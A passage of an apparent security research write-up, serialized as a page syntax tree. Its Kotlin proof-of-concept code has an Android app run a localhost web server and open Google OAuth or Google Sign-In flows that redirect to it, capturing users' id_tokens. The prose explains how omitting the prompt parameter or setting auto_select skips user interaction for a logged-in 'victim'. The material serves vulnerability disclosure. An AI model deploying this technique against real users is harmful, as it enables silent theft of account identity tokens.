browserIntent = Intent(Intent.ACTION_VIEW, Uri.parse(googleOAuthUrl))\n        startActivity(browserIntent)\n    }\n\n    private fun startWebServer() {\n        embeddedServer(CIO, port = 3000) {\n            routing {\n                get(\"{...}\") {\n                    call.respondHtml {\n                        head {\n                            meta(charset = \"UTF-8\")\n                            meta(name = \"viewport\", content = \"width=device-width, initial-scale=1.0\")\n                            title(\"OAuth Redirect\")\n                        }\n                        body {\n                            h1 { +\"Google OAuth Redirect\" }\n                            script {\n                                +\"document.body.innerText = location.hash;\"\n                            }\n                        }\n                    }\n                }\n            }\n        }.start(wait = true)\n    }\n","kt",[102718],{"type":26,"tag":130,"props":102719,"children":102720},{"__ignoreMap":7},[102721,102750,102769,102776,102783,102802,102813,102824,102855,102878,102925,102932,102939,102946,102953,102973,103004,103015,103022,103029,103048,103071,103082,103101,103116,103127,103150,103185,103204,103211,103222,103245,103256,103268,103275,103282,103289,103296,103303,103330],{"type":26,"tag":137,"props":102722,"children":102723},{"class":5559,"line":5560},[102724,102729,102733,102737,102741,102745],{"type":26,"tag":137,"props":102725,"children":102726},{"style":5573},[102727],{"type":32,"value":102728}," override",{"type":26,"tag":137,"props":102730,"children":102731},{"style":5573},[102732],{"type":32,"value":8792},{"type":26,"tag":137,"props":102734,"children":102735},{"style":5682},[102736],{"type":32,"value":73055},{"type":26,"tag":137,"props":102738,"children":102739},{"style":5601},[102740],{"type":32,"value":73060},{"type":26,"tag":137,"props":102742,"children":102743},{"style":6009},[102744],{"type":32,"value":73065},{"type":26,"tag":137,"props":102746,"children":102747},{"style":5601},[102748],{"type":32,"value":102749},"?){\n",{"type":26,"tag":137,"props":102751,"children":102752},{"class":5559,"line":5412},[102753,102757,102761,102765],{"type":26,"tag":137,"props":102754,"children":102755},{"style":5573},[102756],{"type":32,"value":73078},{"type":26,"tag":137,"props":102758,"children":102759},{"style":5601},[102760],{"type":32,"value":470},{"type":26,"tag":137,"props":102762,"children":102763},{"style":5682},[102764],{"type":32,"value":73087},{"type":26,"tag":137,"props":102766,"children":102767},{"style":5601},[102768],{"type":32,"value":73092},{"type":26,"tag":137,"props":102770,"children":102771},{"class":5559,"line":5417},[102772],{"type":26,"tag":137,"props":102773,"children":102774},{"emptyLinePlaceholder":18},[102775],{"type":32,"value":6276},{"type":26,"tag":137,"props":102777,"children":102778},{"class":5559,"line":5642},[102779],{"type":26,"tag":137,"props":102780,"children":102781},{"style":5564},[102782],{"type":32,"value":73107},{"type":26,"tag":137,"props":102784,"children":102785},{"class":5559,"line":5745},[102786,102790,102794,102798],{"type":26,"tag":137,"props":102787,"children":102788},{"style":5682},[102789],{"type":32,"value":73115},{"type":26,"tag":137,"props":102791,"children":102792},{"style":5601},[102793],{"type":32,"value":73120},{"type":26,"tag":137,"props":102795,"children":102796},{"style":5682},[102797],{"type":32,"value":73125},{"type":26,"tag":137,"props":102799,"children":102800},{"style":5601},[102801],{"type":32,"value":5875},{"type":26,"tag":137,"props":102803,"children":102804},{"class":5559,"line":5850},[102805,102809],{"type":26,"tag":137,"props":102806,"children":102807},{"style":5610},[102808],{"type":32,"value":73137},{"type":26,"tag":137,"props":102810,"children":102811},{"style":5601},[102812],{"type":32,"value":5875},{"type":26,"tag":137,"props":102814,"children":102815},{"class":5559,"line":5878},[102816,102820],{"type":26,"tag":137,"props":102817,"children":102818},{"style":5682},[102819],{"type":32,"value":73149},{"type":26,"tag":137,"props":102821,"children":102822},{"style":5601},[102823],{"type":32,"value":10320},{"type":26,"tag":137,"props":102825,"children":102826},{"class":5559,"line":5891},[102827,102831,102835,102839,102843,102847,102851],{"type":26,"tag":137,"props":102828,"children":102829},{"style":5601},[102830],{"type":32,"value":73161},{"type":26,"tag":137,"props":102832,"children":102833},{"style":5682},[102834],{"type":32,"value":3293},{"type":26,"tag":137,"props":102836,"children":102837},{"style":5601},[102838],{"type":32,"value":165},{"type":26,"tag":137,"props":102840,"children":102841},{"style":6837},[102842],{"type":32,"value":73174},{"type":26,"tag":137,"props":102844,"children":102845},{"style":5601},[102846],{"type":32,"value":1108},{"type":26,"tag":137,"props":102848,"children":102849},{"style":6837},[102850],{"type":32,"value":73183},{"type":26,"tag":137,"props":102852,"children":102853},{"style":5601},[102854],{"type":32,"value":5742},{"type":26,"tag":137,"props":102856,"children":102857},{"class":5559,"line":5909},[102858,102862,102866,102870,102874],{"type":26,"tag":137,"props":102859,"children":102860},{"style":5601},[102861],{"type":32,"value":73195},{"type":26,"tag":137,"props":102863,"children":102864},{"style":5573},[102865],{"type":32,"value":51013},{"type":26,"tag":137,"props":102867,"children":102868},{"style":5601},[102869],{"type":32,"value":73204},{"type":26,"tag":137,"props":102871,"children":102872},{"style":6009},[102873],{"type":32,"value":73209},{"type":26,"tag":137,"props":102875,"children":102876},{"style":5601},[102877],{"type":32,"value":17395},{"type":26,"tag":137,"props":102879,"children":102880},{"class":5559,"line":5930},[102881,102885,102889,102893,102897,102901,102905,102909,102913,102917,102921],{"type":26,"tag":137,"props":102882,"children":102883},{"style":5601},[102884],{"type":32,"value":73161},{"type":26,"tag":137,"props":102886,"children":102887},{"style":5682},[102888],{"type":32,"value":54057},{"type":26,"tag":137,"props":102890,"children":102891},{"style":5601},[102892],{"type":32,"value":165},{"type":26,"tag":137,"props":102894,"children":102895},{"style":6837},[102896],{"type":32,"value":73174},{"type":26,"tag":137,"props":102898,"children":102899},{"style":5601},[102900],{"type":32,"value":1108},{"type":26,"tag":137,"props":102902,"children":102903},{"style":6837},[102904],{"type":32,"value":73241},{"type":26,"tag":137,"props":102906,"children":102907},{"style":5573},[102908],{"type":32,"value":36704},{"type":26,"tag":137,"props":102910,"children":102911},{"style":5590},[102912],{"type":32,"value":73250},{"type":26,"tag":137,"props":102914,"children":102915},{"style":5573},[102916],{"type":32,"value":36736},{"type":26,"tag":137,"props":102918,"children":102919},{"style":6837},[102920],{"type":32,"value":22653},{"type":26,"tag":137,"props":102922,"children":102923},{"style":5601},[102924],{"type":32,"value":73263},{"type":26,"tag":137,"props":102926,"children":102927},{"class":5559,"line":5939},[102928],{"type":26,"tag":137,"props":102929,"children":102930},{"style":5601},[102931],{"type":32,"value":61486},{"type":26,"tag":137,"props":102933,"children":102934},{"class":5559,"line":6191},[102935],{"type":26,"tag":137,"props":102936,"children":102937},{"style":5601},[102938],{"type":32,"value":5936},{"type":26,"tag":137,"props":102940,"children":102941},{"class":5559,"line":6208},[102942],{"type":26,"tag":137,"props":102943,"children":102944},{"emptyLinePlaceholder":18},[102945],{"type":32,"value":6276},{"type":26,"tag":137,"props":102947,"children":102948},{"class":5559,"line":6225},[102949],{"type":26,"tag":137,"props":102950,"children":102951},{"style":5564},[102952],{"type":32,"value":73292},{"type":26,"tag":137,"props":102954,"children":102955},{"class":5559,"line":6238},[102956,102960,102964,102968],{"type":26,"tag":137,"props":102957,"children":102958},{"style":5573},[102959],{"type":32,"value":73300},{"type":26,"tag":137,"props":102961,"children":102962},{"style":5601},[102963],{"type":32,"value":73305},{"type":26,"tag":137,"props":102965,"children":102966},{"style":5590},[102967],{"type":32,"value":289},{"type":26,"tag":137,"props":102969,"children":102970},{"style":6837},[102971],{"type":32,"value":102972}," \"https://accounts.google.com/o/oauth2/v2/auth/oauthchooseaccount?client_id=redacted&redirect_uri=http://localhost:3000/auth/index.html&response_type=id_token&scope=email&nonce=redacted&prompt=select_account&service=lso&o2v=2&flowName=GeneralOAuthFlow\"\n",{"type":26,"tag":137,"props":102974,"children":102975},{"class":5559,"line":6247},[102976,102980,102984,102988,102992,102996,103000],{"type":26,"tag":137,"props":102977,"children":102978},{"style":5573},[102979],{"type":32,"value":73300},{"type":26,"tag":137,"props":102981,"children":102982},{"style":5601},[102983],{"type":32,"value":73326},{"type":26,"tag":137,"props":102985,"children":102986},{"style":5590},[102987],{"type":32,"value":289},{"type":26,"tag":137,"props":102989,"children":102990},{"style":5682},[102991],{"type":32,"value":73335},{"type":26,"tag":137,"props":102993,"children":102994},{"style":5601},[102995],{"type":32,"value":73340},{"type":26,"tag":137,"props":102997,"children":102998},{"style":5682},[102999],{"type":32,"value":41808},{"type":26,"tag":137,"props":103001,"children":103002},{"style":5601},[103003],{"type":32,"value":73349},{"type":26,"tag":137,"props":103005,"children":103006},{"class":5559,"line":6270},[103007,103011],{"type":26,"tag":137,"props":103008,"children":103009},{"style":5682},[103010],{"type":32,"value":73357},{"type":26,"tag":137,"props":103012,"children":103013},{"style":5601},[103014],{"type":32,"value":73362},{"type":26,"tag":137,"props":103016,"children":103017},{"class":5559,"line":6279},[103018],{"type":26,"tag":137,"props":103019,"children":103020},{"style":5601},[103021],{"type":32,"value":5945},{"type":26,"tag":137,"props":103023,"children":103024},{"class":5559,"line":6288},[103025],{"type":26,"tag":137,"props":103026,"children":103027},{"emptyLinePlaceholder":18},[103028],{"type":32,"value":6276},{"type":26,"tag":137,"props":103030,"children":103031},{"class":5559,"line":6355},[103032,103036,103040,103044],{"type":26,"tag":137,"props":103033,"children":103034},{"style":5573},[103035],{"type":32,"value":73384},{"type":26,"tag":137,"props":103037,"children":103038},{"style":5573},[103039],{"type":32,"value":8792},{"type":26,"tag":137,"props":103041,"children":103042},{"style":5682},[103043],{"type":32,"value":73393},{"type":26,"tag":137,"props":103045,"children":103046},{"style":5601},[103047],{"type":32,"value":18328},{"type":26,"tag":137,"props":103049,"children":103050},{"class":5559,"line":6363},[103051,103055,103059,103063,103067],{"type":26,"tag":137,"props":103052,"children":103053},{"style":5682},[103054],{"type":32,"value":73405},{"type":26,"tag":137,"props":103056,"children":103057},{"style":5601},[103058],{"type":32,"value":73410},{"type":26,"tag":137,"props":103060,"children":103061},{"style":5590},[103062],{"type":32,"value":289},{"type":26,"tag":137,"props":103064,"children":103065},{"style":5626},[103066],{"type":32,"value":73419},{"type":26,"tag":137,"props":103068,"children":103069},{"style":5601},[103070],{"type":32,"value":17395},{"type":26,"tag":137,"props":103072,"children":103073},{"class":5559,"line":6393},[103074,103078],{"type":26,"tag":137,"props":103075,"children":103076},{"style":5682},[103077],{"type":32,"value":73431},{"type":26,"tag":137,"props":103079,"children":103080},{"style":5601},[103081],{"type":32,"value":5875},{"type":26,"tag":137,"props":103083,"children":103084},{"class":5559,"line":6401},[103085,103089,103093,103097],{"type":26,"tag":137,"props":103086,"children":103087},{"style":5573},[103088],{"type":32,"value":73443},{"type":26,"tag":137,"props":103090,"children":103091},{"style":5601},[103092],{"type":32,"value":165},{"type":26,"tag":137,"props":103094,"children":103095},{"style":6837},[103096],{"type":32,"value":73452},{"type":26,"tag":137,"props":103098,"children":103099},{"style":5601},[103100],{"type":32,"value":17395},{"type":26,"tag":137,"props":103102,"children":103103},{"class":5559,"line":6433},[103104,103108,103112],{"type":26,"tag":137,"props":103105,"children":103106},{"style":5601},[103107],{"type":32,"value":73464},{"type":26,"tag":137,"props":103109,"children":103110},{"style":5682},[103111],{"type":32,"value":73469},{"type":26,"tag":137,"props":103113,"children":103114},{"style":5601},[103115],{"type":32,"value":5875},{"type":26,"tag":137,"props":103117,"children":103118},{"class":5559,"line":6441},[103119,103123],{"type":26,"tag":137,"props":103120,"children":103121},{"style":5682},[103122],{"type":32,"value":73481},{"type":26,"tag":137,"props":103124,"children":103125},{"style":5601},[103126],{"type":32,"value":5875},{"type":26,"tag":137,"props":103128,"children":103129},{"class":5559,"line":6501},[103130,103134,103138,103142,103146],{"type":26,"tag":137,"props":103131,"children":103132},{"style":5682},[103133],{"type":32,"value":73493},{"type":26,"tag":137,"props":103135,"children":103136},{"style":5601},[103137],{"type":32,"value":73498},{"type":26,"tag":137,"props":103139,"children":103140},{"style":5590},[103141],{"type":32,"value":289},{"type":26,"tag":137,"props":103143,"children":103144},{"style":6837},[103145],{"type":32,"value":73507},{"type":26,"tag":137,"props":103147,"children":103148},{"style":5601},[103149],{"type":32,"value":5742},{"type":26,"tag":137,"props":103151,"children":103152},{"class":5559,"line":11634},[103153,103157,103161,103165,103169,103173,103177,103181],{"type":26,"tag":137,"props":103154,"children":103155},{"style":5682},[103156],{"type":32,"value":73493},{"type":26,"tag":137,"props":103158,"children":103159},{"style":5601},[103160],{"type":32,"value":73523},{"type":26,"tag":137,"props":103162,"children":103163},{"style":5590},[103164],{"type":32,"value":289},{"type":26,"tag":137,"props":103166,"children":103167},{"style":6837},[103168],{"type":32,"value":73532},{"type":26,"tag":137,"props":103170,"children":103171},{"style":5601},[103172],{"type":32,"value":73537},{"type":26,"tag":137,"props":103174,"children":103175},{"style":5590},[103176],{"type":32,"value":289},{"type":26,"tag":137,"props":103178,"children":103179},{"style":6837},[103180],{"type":32,"value":73546},{"type":26,"tag":137,"props":103182,"children":103183},{"style":5601},[103184],{"type":32,"value":5742},{"type":26,"tag":137,"props":103186,"children":103187},{"class":5559,"line":11652},[103188,103192,103196,103200],{"type":26,"tag":137,"props":103189,"children":103190},{"style":5682},[103191],{"type":32,"value":73558},{"type":26,"tag":137,"props":103193,"children":103194},{"style":5601},[103195],{"type":32,"value":165},{"type":26,"tag":137,"props":103197,"children":103198},{"style":6837},[103199],{"type":32,"value":73567},{"type":26,"tag":137,"props":103201,"children":103202},{"style":5601},[103203],{"type":32,"value":5742},{"type":26,"tag":137,"props":103205,"children":103206},{"class":5559,"line":11697},[103207],{"type":26,"tag":137,"props":103208,"children":103209},{"style":5601},[103210],{"type":32,"value":73579},{"type":26,"tag":137,"props":103212,"children":103213},{"class":5559,"line":11803},[103214,103218],{"type":26,"tag":137,"props":103215,"children":103216},{"style":5682},[103217],{"type":32,"value":73587},{"type":26,"tag":137,"props":103219,"children":103220},{"style":5601},[103221],{"type":32,"value":5875},{"type":26,"tag":137,"props":103223,"children":103224},{"class":5559,"line":26089},[103225,103229,103233,103237,103241],{"type":26,"tag":137,"props":103226,"children":103227},{"style":5682},[103228],{"type":32,"value":73599},{"type":26,"tag":137,"props":103230,"children":103231},{"style":5601},[103232],{"type":32,"value":12175},{"type":26,"tag":137,"props":103234,"children":103235},{"style":5590},[103236],{"type":32,"value":356},{"type":26,"tag":137,"props":103238,"children":103239},{"style":6837},[103240],{"type":32,"value":73612},{"type":26,"tag":137,"props":103242,"children":103243},{"style":5601},[103244],{"type":32,"value":12185},{"type":26,"tag":137,"props":103246,"children":103247},{"class":5559,"line":26124},[103248,103252],{"type":26,"tag":137,"props":103249,"children":103250},{"style":5682},[103251],{"type":32,"value":73624},{"type":26,"tag":137,"props":103253,"children":103254},{"style":5601},[103255],{"type":32,"value":5875},{"type":26,"tag":137,"props":103257,"children":103258},{"class":5559,"line":26132},[103259,103263],{"type":26,"tag":137,"props":103260,"children":103261},{"style":5590},[103262],{"type":32,"value":73636},{"type":26,"tag":137,"props":103264,"children":103265},{"style":6837},[103266],{"type":32,"value":103267},"\"document.body.innerText = location.hash;\"\n",{"type":26,"tag":137,"props":103269,"children":103270},{"class":5559,"line":26140},[103271],{"type":26,"tag":137,"props":103272,"children":103273},{"style":5601},[103274],{"type":32,"value":73649},{"type":26,"tag":137,"props":103276,"children":103277},{"class":5559,"line":26149},[103278],{"type":26,"tag":137,"props":103279,"children":103280},{"style":5601},[103281],{"type":32,"value":73579},{"type":26,"tag":137,"props":103283,"children":103284},{"class":5559,"line":26191},[103285],{"type":26,"tag":137,"props":103286,"children":103287},{"style":5601},[103288],{"type":32,"value":73664},{"type":26,"tag":137,"props":103290,"children":103291},{"class":5559,"line":26224},[103292],{"type":26,"tag":137,"props":103293,"children":103294},{"style":5601},[103295],{"type":32,"value":73672},{"type":26,"tag":137,"props":103297,"children":103298},{"class":5559,"line":26232},[103299],{"type":26,"tag":137,"props":103300,"children":103301},{"style":5601},[103302],{"type":32,"value":61486},{"type":26,"tag":137,"props":103304,"children":103305},{"class":5559,"line":26240},[103306,103310,103314,103318,103322,103326],{"type":26,"tag":137,"props":103307,"children":103308},{"style":5601},[103309],{"type":32,"value":73687},{"type":26,"tag":137,"props":103311,"children":103312},{"style":5682},[103313],{"type":32,"value":73692},{"type":26,"tag":137,"props":103315,"children":103316},{"style":5601},[103317],{"type":32,"value":73697},{"type":26,"tag":137,"props":103319,"children":103320},{"style":5590},[103321],{"type":32,"value":289},{"type":26,"tag":137,"props":103323,"children":103324},{"style":5573},[103325],{"type":32,"value":15060},{"type":26,"tag":137,"props":103327,"children":103328},{"style":5601},[103329],{"type":32,"value":5742},{"type":26,"tag":137,"props":103331,"children":103332},{"class":5559,"line":26249},[103333],{"type":26,"tag":137,"props":103334,"children":103335},{"style":5601},[103336],{"type":32,"value":5945},{"type":26,"tag":35,"props":103338,"children":103339},{},[103340],{"type":32,"value":103341},"In this case, the prompt parameter can be omitted from the URL. This way, if the victim is already logged in, the OAuth 2.0 prompt interaction will be skipped.",{"type":26,"tag":35,"props":103343,"children":103344},{},[103345,103347,103353],{"type":32,"value":103346},"If Google Sign-In (GSI) is being used, we found that it's possible to use the ",{"type":26,"tag":130,"props":103348,"children":103350},{"className":103349},[],[103351],{"type":32,"value":103352},"auto_select",{"type":32,"value":103354}," parameter to trigger automatic reauthentication and bypass user interaction:",{"type":26,"tag":5512,"props":103356,"children":103358},{"className":102714,"code":103357,"language":102716,"meta":7,"style":7},"    override fun onCreate(savedInstanceState: Bundle?) {\n        super.onCreate(savedInstanceState)\n\n        CoroutineScope(Dispatchers.IO).launch {\n            try {\n                startWebServer()\n                Log.d(\"WebServer\", \"Server started on http://localhost:3000\")\n            } catch (e: Exception) {\n                Log.e(\"WebServer\", \"Error starting server: ${e.message}\", e)\n            }\n        }\n\n        val browserIntent = Intent(Intent.ACTION_VIEW, Uri.parse(\"http://localhost:3000\"))\n        startActivity(browserIntent)\n    }\n\n    private fun startWebServer() {\n        embeddedServer(CIO, port = 3000) {\n            routing {\n                get(\"{...}\") {\n                    call.respondHtml {\n                        head {\n                            title(\"Test\")\n                            script {\n                                src = \"https://accounts.google.com/gsi/client\"\n                                attributes[\"async\"] = \"\"\n                                attributes[\"defer\"] = \"\"\n                            }\n                            script {\n                                unsafe {\n                                    +\"\"\"\n    function handleCredentialResponse(response) {\n      alert(\"credential: \" + response.credential);\n    }\n\n    window.onload = async function () {\n      const oauth_url = new URL(`https://accounts.google.com/o/oauth2/v2/auth/oauthchooseaccount?as=uolEFCMgoGJXBVuGdJja0XdzjrWqOE6iFaK1SBNY9Zk&client_id=redacted&scope=openid%20email%20profile&response_type=id_token&gsiwebsdk=gis_attributes&redirect_uri=http%3A%2F%2Flocalhost%3A3000&response_mode=form_post&origin=http%3A%2F%2Flocalhost%3A3000&display=popup&prompt=select_account&gis_params=ChFodHRwczovL2F6Yml0LmNvbRIRaHR0cHM6Ly9hemJpdC5jb20YByordW9sRUZDTWdvR0pYQlZ1R2RKamEwWGR6anJXcU9FNmlGYUsxU0JOWTlaazJINzE3OTQyNTg0NjQyLXVrb25tbDZkNXM0MjJrZWVpa2RmMTJwdnV1aG1sOWYyLmFwcHMuZ29vZ2xldXNlcmNvbnRlbnQuY29tOAFCQDI0NDlkNGMwMTI3NDQxNGRlMzg5YjFlYjE1MzFmYTAxYTdjM2M5MTFhOTMxNzIxNGJhZTFmODkzNjE2MzIxZDA&service=lso&o2v=1&flowName=GeneralOAuthFlow`);\n      const client_id = oauth_url.searchParams.get(\"client_id\");\n      google.accounts.id.initialize({\n        client_id: client_id,\n        callback: handleCredentialResponse,\n        auto_select: true\n      });\n\n      google.accounts.id.renderButton(\n        document.getElementById(\"g_id_signin\"),\n        { theme: \"outline\", size: \"large\" }\n      );\n\n      google.accounts.id.prompt();\n    };\n                                    \"\"\".trimIndent()\n                                }\n                            }\n                        }\n                        body {\n                            h1 { +\"Login here:\" }\n                            div {\n                                id = \"g_id_signin\"\n                            }\n                        }\n                    }\n                }\n            }\n        }.start(wait = true)\n    }\n",[103359],{"type":26,"tag":130,"props":103360,"children":103361},{"__ignoreMap":7},[103362,103389,103408,103415,103434,103445,103456,103487,103510,103557,103564,103571,103578,103618,103629,103636,103643,103662,103685,103696,103715,103730,103741,103761,103772,103789,103815,103839,103846,103857,103869,103882,103890,103898,103905,103912,103920,103928,103936,103944,103952,103960,103968,103975,103982,103990,103998,104006,104013,104020,104028,104035,104056,104064,104071,104078,104089,104113,104125,104142,104149,104156,104164,104172,104180,104208],{"type":26,"tag":137,"props":103363,"children":103364},{"class":5559,"line":5560},[103365,103369,103373,103377,103381,103385],{"type":26,"tag":137,"props":103366,"children":103367},{"style":5573},[103368],{"type":32,"value":73046},{"type":26,"tag":137,"props":103370,"children":103371},{"style":5573},[103372],{"type":32,"value":8792},{"type":26,"tag":137,"props":103374,"children":103375},{"style":5682},[103376],{"type":32,"value":73055},{"type":26,"tag":137,"props":103378,"children":103379},{"style":5601},[103380],{"type":32,"value":73060},{"type":26,"tag":137,"props":103382,"children":103383},{"style":6009},[103384],{"type":32,"value":73065},{"type":26,"tag":137,"props":103386,"children":103387},{"style":5601},[103388],{"type":32,"value":73070},{"type":26,"tag":137,"props":103390,"children":103391},{"class":5559,"line":5412},[103392,103396,103400,103404],{"type":26,"tag":137,"props":103393,"children":103394},{"style":5573},[103395],{"type":32,"value":73078},{"type":26,"tag":137,"props":103397,"children":103398},{"style":5601},[103399],{"type":32,"value":470},{"type":26,"tag":137,"props":103401,"children":103402},{"style":5682},[103403],{"type":32,"value":73087},{"type":26,"tag":137,"props":103405,"children":103406},{"style":5601},[103407],{"type":32,"value":73092},{"type":26,"tag":137,"props":103409,"children":103410},{"class":5559,"line":5417},[103411],{"type":26,"tag":137,"props":103412,"children":103413},{"emptyLinePlaceholder":18},[103414],{"type":32,"value":6276},{"type":26,"tag":137,"props":103416,"children":103417},{"class":5559,"line":5642},[103418,103422,103426,103430],{"type":26,"tag":137,"props":103419,"children":103420},{"style":5682},[103421],{"type":32,"value":73115},{"type":26,"tag":137,"props":103423,"children":103424},{"style":5601},[103425],{"type":32,"value":73120},{"type":26,"tag":137,"props":103427,"children":103428},{"style":5682},[103429],{"type":32,"value":73125},{"type":26,"tag":137,"props":103431,"children":103432},{"style":5601},[103433],{"type":32,"value":5875},{"type":26,"tag":137,"props":103435,"children":103436},{"class":5559,"line":5745},[103437,103441],{"type":26,"tag":137,"props":103438,"children":103439},{"style":5610},[103440],{"type":32,"value":73137},{"type":26,"tag":137,"props":103442,"children":103443},{"style":5601},[103444],{"type":32,"value":5875},{"type":26,"tag":137,"props":103446,"children":103447},{"class":5559,"line":5850},[103448,103452],{"type":26,"tag":137,"props":103449,"children":103450},{"style":5682},[103451],{"type":32,"value":73149},{"type":26,"tag":137,"props":103453,"children":103454},{"style":5601},[103455],{"type":32,"value":10320},{"type":26,"tag":137,"props":103457,"children":103458},{"class":5559,"line":5878},[103459,103463,103467,103471,103475,103479,103483],{"type":26,"tag":137,"props":103460,"children":103461},{"style":5601},[103462],{"type":32,"value":73161},{"type":26,"tag":137,"props":103464,"children":103465},{"style":5682},[103466],{"type":32,"value":3293},{"type":26,"tag":137,"props":103468,"children":103469},{"style":5601},[103470],{"type":32,"value":165},{"type":26,"tag":137,"props":103472,"children":103473},{"style":6837},[103474],{"type":32,"value":73174},{"type":26,"tag":137,"props":103476,"children":103477},{"style":5601},[103478],{"type":32,"value":1108},{"type":26,"tag":137,"props":103480,"children":103481},{"style":6837},[103482],{"type":32,"value":73183},{"type":26,"tag":137,"props":103484,"children":103485},{"style":5601},[103486],{"type":32,"value":5742},{"type":26,"tag":137,"props":103488,"children":103489},{"class":5559,"line":5891},[103490,103494,103498,103502,103506],{"type":26,"tag":137,"props":103491,"children":103492},{"style":5601},[103493],{"type":32,"value":73195},{"type":26,"tag":137,"props":103495,"children":103496},{"style":5573},[103497],{"type":32,"value":51013},{"type":26,"tag":137,"props":103499,"children":103500},{"style":5601},[103501],{"type":32,"value":73204},{"type":26,"tag":137,"props":103503,"children":103504},{"style":6009},[103505],{"type":32,"value":73209},{"type":26,"tag":137,"props":103507,"children":103508},{"style":5601},[103509],{"type":32,"value":17395},{"type":26,"tag":137,"props":103511,"children":103512},{"class":5559,"line":5909},[103513,103517,103521,103525,103529,103533,103537,103541,103545,103549,103553],{"type":26,"tag":137,"props":103514,"children":103515},{"style":5601},[103516],{"type":32,"value":73161},{"type":26,"tag":137,"props":103518,"children":103519},{"style":5682},[103520],{"type":32,"value":54057},{"type":26,"tag":137,"props":103522,"children":103523},{"style":5601},[103524],{"type":32,"value":165},{"type":26,"tag":137,"props":103526,"children":103527},{"style":6837},[103528],{"type":32,"value":73174},{"type":26,"tag":137,"props":103530,"children":103531},{"style":5601},[103532],{"type":32,"value":1108},{"type":26,"tag":137,"props":103534,"children":103535},{"style":6837},[103536],{"type":32,"value":73241},{"type":26,"tag":137,"props":103538,"children":103539},{"style":5573},[103540],{"type":32,"value":36704},{"type":26,"tag":137,"props":103542,"children":103543},{"style":5590},[103544],{"type":32,"value":73250},{"type":26,"tag":137,"props":103546,"children":103547},{"style":5573},[103548],{"type":32,"value":36736},{"type":26,"tag":137,"props":103550,"children":103551},{"style":6837},[103552],{"type":32,"value":22653},{"type":26,"tag":137,"props":103554,"children":103555},{"style":5601},[103556],{"type":32,"value":73263},{"type":26,"tag":137,"props":103558,"children":103559},{"class":5559,"line":5930},[103560],{"type":26,"tag":137,"props":103561,"children":103562},{"style":5601},[103563],{"type":32,"value":61486},{"type":26,"tag":137,"props":103565,"children":103566},{"class":5559,"line":5939},[103567],{"type":26,"tag":137,"props":103568,"children":103569},{"style":5601},[103570],{"type":32,"value":5936},{"type":26,"tag":137,"props":103572,"children":103573},{"class":5559,"line":6191},[103574],{"type":26,"tag":137,"props":103575,"children":103576},{"emptyLinePlaceholder":18},[103577],{"type":32,"value":6276},{"type":26,"tag":137,"props":103579,"children":103580},{"class":5559,"line":6208},[103581,103585,103589,103593,103597,103601,103605,103609,103614],{"type":26,"tag":137,"props":103582,"children":103583},{"style":5573},[103584],{"type":32,"value":73300},{"type":26,"tag":137,"props":103586,"children":103587},{"style":5601},[103588],{"type":32,"value":73326},{"type":26,"tag":137,"props":103590,"children":103591},{"style":5590},[103592],{"type":32,"value":289},{"type":26,"tag":137,"props":103594,"children":103595},{"style":5682},[103596],{"type":32,"value":73335},{"type":26,"tag":137,"props":103598,"children":103599},{"style":5601},[103600],{"type":32,"value":73340},{"type":26,"tag":137,"props":103602,"children":103603},{"style":5682},[103604],{"type":32,"value":41808},{"type":26,"tag":137,"props":103606,"children":103607},{"style":5601},[103608],{"type":32,"value":165},{"type":26,"tag":137,"props":103610,"children":103611},{"style":6837},[103612],{"type":32,"value":103613},"\"http://localhost:3000\"",{"type":26,"tag":137,"props":103615,"children":103616},{"style":5601},[103617],{"type":32,"value":22305},{"type":26,"tag":137,"props":103619,"children":103620},{"class":5559,"line":6225},[103621,103625],{"type":26,"tag":137,"props":103622,"children":103623},{"style":5682},[103624],{"type":32,"value":73357},{"type":26,"tag":137,"props":103626,"children":103627},{"style":5601},[103628],{"type":32,"value":73362},{"type":26,"tag":137,"props":103630,"children":103631},{"class":5559,"line":6238},[103632],{"type":26,"tag":137,"props":103633,"children":103634},{"style":5601},[103635],{"type":32,"value":5945},{"type":26,"tag":137,"props":103637,"children":103638},{"class":5559,"line":6247},[103639],{"type":26,"tag":137,"props":103640,"children":103641},{"emptyLinePlaceholder":18},[103642],{"type":32,"value":6276},{"type":26,"tag":137,"props":103644,"children":103645},{"class":5559,"line":6270},[103646,103650,103654,103658],{"type":26,"tag":137,"props":103647,"children":103648},{"style":5573},[103649],{"type":32,"value":73384},{"type":26,"tag":137,"props":103651,"children":103652},{"style":5573},[103653],{"type":32,"value":8792},{"type":26,"tag":137,"props":103655,"children":103656},{"style":5682},[103657],{"type":32,"value":73393},{"type":26,"tag":137,"props":103659,"children":103660},{"style":5601},[103661],{"type":32,"value":18328},{"type":26,"tag":137,"props":103663,"children":103664},{"class":5559,"line":6279},[103665,103669,103673,103677,103681],{"type":26,"tag":137,"props":103666,"children":103667},{"style":5682},[103668],{"type":32,"value":73405},{"type":26,"tag":137,"props":103670,"children":103671},{"style":5601},[103672],{"type":32,"value":73410},{"type":26,"tag":137,"props":103674,"children":103675},{"style":5590},[103676],{"type":32,"value":289},{"type":26,"tag":137,"props":103678,"children":103679},{"style":5626},[103680],{"type":32,"value":73419},{"type":26,"tag":137,"props":103682,"children":103683},{"style":5601},[103684],{"type":32,"value":17395},{"type":26,"tag":137,"props":103686,"children":103687},{"class":5559,"line":6288},[103688,103692],{"type":26,"tag":137,"props":103689,"children":103690},{"style":5682},[103691],{"type":32,"value":73431},{"type":26,"tag":137,"props":103693,"children":103694},{"style":5601},[103695],{"type":32,"value":5875},{"type":26,"tag":137,"props":103697,"children":103698},{"class":5559,"line":6355},[103699,103703,103707,103711],{"type":26,"tag":137,"props":103700,"children":103701},{"style":5573},[103702],{"type":32,"value":73443},{"type":26,"tag":137,"props":103704,"children":103705},{"style":5601},[103706],{"type":32,"value":165},{"type":26,"tag":137,"props":103708,"children":103709},{"style":6837},[103710],{"type":32,"value":73452},{"type":26,"tag":137,"props":103712,"children":103713},{"style":5601},[103714],{"type":32,"value":17395},{"type":26,"tag":137,"props":103716,"children":103717},{"class":5559,"line":6363},[103718,103722,103726],{"type":26,"tag":137,"props":103719,"children":103720},{"style":5601},[103721],{"type":32,"value":73464},{"type":26,"tag":137,"props":103723,"children":103724},{"style":5682},[103725],{"type":32,"value":73469},{"type":26,"tag":137,"props":103727,"children":103728},{"style":5601},[103729],{"type":32,"value":5875},{"type":26,"tag":137,"props":103731,"children":103732},{"class":5559,"line":6393},[103733,103737],{"type":26,"tag":137,"props":103734,"children":103735},{"style":5682},[103736],{"type":32,"value":73481},{"type":26,"tag":137,"props":103738,"children":103739},{"style":5601},[103740],{"type":32,"value":5875},{"type":26,"tag":137,"props":103742,"children":103743},{"class":5559,"line":6401},[103744,103748,10